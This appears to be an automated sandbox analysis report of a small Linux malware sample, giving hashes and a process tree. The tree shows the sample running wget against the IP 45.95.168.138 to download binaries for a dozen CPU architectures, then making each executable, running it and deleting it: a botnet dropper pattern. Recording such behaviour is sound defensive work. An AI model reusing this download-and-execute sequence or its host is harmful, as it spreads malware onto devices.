Analysis

  • max time kernel
    36s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240418-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240418-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    05/05/2024, 02:27

General

  • Target

    15917961bac6063481040fcc4af85061_JaffaCakes118

  • Size

    1KB

  • MD5

    15917961bac6063481040fcc4af85061

  • SHA1

    cbd80d0978a0aaff4116d680da328cf5fd1153e9

  • SHA256

    f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682

  • SHA512

    a284a0a6483d65b46cef2fd129fc68b40feb2a1bef82cb89ea12027462c23a0dc3ee87e48f09aa7302dc96bcbdf1b4f8bacab82ba7d0507f86e660f03d1b4935

Score
1/10

Malware Config

Signatures

Processes

  • /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118
    /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118
    1⤵
      PID:1533
      • /usr/bin/wget
        wget http://45.95.168.138/mips
        2⤵
          PID:1534
        • /bin/chmod
          chmod +x mips
          2⤵
            PID:1538
          • /tmp/mips
            ./mips
            2⤵
              PID:1539
            • /bin/rm
              rm -rf mips
              2⤵
                PID:1540
              • /usr/bin/wget
                wget http://45.95.168.138/mipsel
                2⤵
                  PID:1541
                • /bin/chmod
                  chmod +x mipsel
                  2⤵
                    PID:1542
                  • /tmp/mipsel
                    ./mipsel
                    2⤵
                      PID:1543
                    • /bin/rm
                      rm -rf mipsel
                      2⤵
                        PID:1544
                      • /usr/bin/wget
                        wget http://45.95.168.138/sh4
                        2⤵
                          PID:1545
                        • /bin/chmod
                          chmod +x sh4
                          2⤵
                            PID:1546
                          • /tmp/sh4
                            ./sh4
                            2⤵
                              PID:1547
                            • /bin/rm
                              rm -rf sh4
                              2⤵
                                PID:1548
                              • /usr/bin/wget
                                wget http://45.95.168.138/x86
                                2⤵
                                  PID:1549
                                • /bin/chmod
                                  chmod +x x86
                                  2⤵
                                    PID:1550
                                  • /tmp/x86
                                    ./x86
                                    2⤵
                                      PID:1551
                                    • /bin/rm
                                      rm -rf x86
                                      2⤵
                                        PID:1552
                                      • /usr/bin/wget
                                        wget http://45.95.168.138/armv6l
                                        2⤵
                                          PID:1553
                                        • /bin/chmod
                                          chmod +x armv6l
                                          2⤵
                                            PID:1554
                                          • /tmp/armv6l
                                            ./armv6l
                                            2⤵
                                              PID:1555
                                            • /bin/rm
                                              rm -rf armv6l
                                              2⤵
                                                PID:1556
                                              • /usr/bin/wget
                                                wget http://45.95.168.138/i686
                                                2⤵
                                                  PID:1557
                                                • /bin/chmod
                                                  chmod +x i686
                                                  2⤵
                                                    PID:1558
                                                  • /tmp/i686
                                                    ./i686
                                                    2⤵
                                                      PID:1559
                                                    • /bin/rm
                                                      rm -rf i686
                                                      2⤵
                                                        PID:1560
                                                      • /usr/bin/wget
                                                        wget http://45.95.168.138/powerpc
                                                        2⤵
                                                          PID:1561
                                                        • /bin/chmod
                                                          chmod +x powerpc
                                                          2⤵
                                                            PID:1562
                                                          • /tmp/powerpc
                                                            ./powerpc
                                                            2⤵
                                                              PID:1563
                                                            • /bin/rm
                                                              rm -rf powerpc
                                                              2⤵
                                                                PID:1564
                                                              • /usr/bin/wget
                                                                wget http://45.95.168.138/i586
                                                                2⤵
                                                                  PID:1565
                                                                • /bin/chmod
                                                                  chmod +x i586
                                                                  2⤵
                                                                    PID:1566
                                                                  • /tmp/i586
                                                                    ./i586
                                                                    2⤵
                                                                      PID:1567
                                                                    • /bin/rm
                                                                      rm -rf i586
                                                                      2⤵
                                                                        PID:1568
                                                                      • /usr/bin/wget
                                                                        wget http://45.95.168.138/m68k
                                                                        2⤵
                                                                          PID:1569
                                                                        • /bin/chmod
                                                                          chmod +x m68k
                                                                          2⤵
                                                                            PID:1570
                                                                          • /tmp/m68k
                                                                            ./m68k
                                                                            2⤵
                                                                              PID:1571
                                                                            • /bin/rm
                                                                              rm -rf m68k
                                                                              2⤵
                                                                                PID:1572
                                                                              • /usr/bin/wget
                                                                                wget http://45.95.168.138/sparc
                                                                                2⤵
                                                                                  PID:1573
                                                                                • /bin/chmod
                                                                                  chmod +x sparc
                                                                                  2⤵
                                                                                    PID:1576
                                                                                  • /tmp/sparc
                                                                                    ./sparc
                                                                                    2⤵
                                                                                      PID:1577
                                                                                    • /bin/rm
                                                                                      rm -rf sparc
                                                                                      2⤵
                                                                                        PID:1578
                                                                                      • /usr/bin/wget
                                                                                        wget http://45.95.168.138/armv4l
                                                                                        2⤵
                                                                                          PID:1579
                                                                                        • /bin/chmod
                                                                                          chmod +x armv4l
                                                                                          2⤵
                                                                                            PID:1580
                                                                                          • /tmp/armv4l
                                                                                            ./armv4l
                                                                                            2⤵
                                                                                              PID:1581
                                                                                            • /bin/rm
                                                                                              rm -rf armv4l
                                                                                              2⤵
                                                                                                PID:1582
                                                                                              • /usr/bin/wget
                                                                                                wget http://45.95.168.138/armv5l
                                                                                                2⤵
                                                                                                  PID:1583
                                                                                                • /bin/chmod
                                                                                                  chmod +x armv5l
                                                                                                  2⤵
                                                                                                    PID:1584
                                                                                                  • /tmp/armv5l
                                                                                                    ./armv5l
                                                                                                    2⤵
                                                                                                      PID:1585
                                                                                                    • /bin/rm
                                                                                                      rm -rf armv5l
                                                                                                      2⤵
                                                                                                        PID:1586

                                                                                                    Network

                                                                                                          MITRE ATT&CK Matrix

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads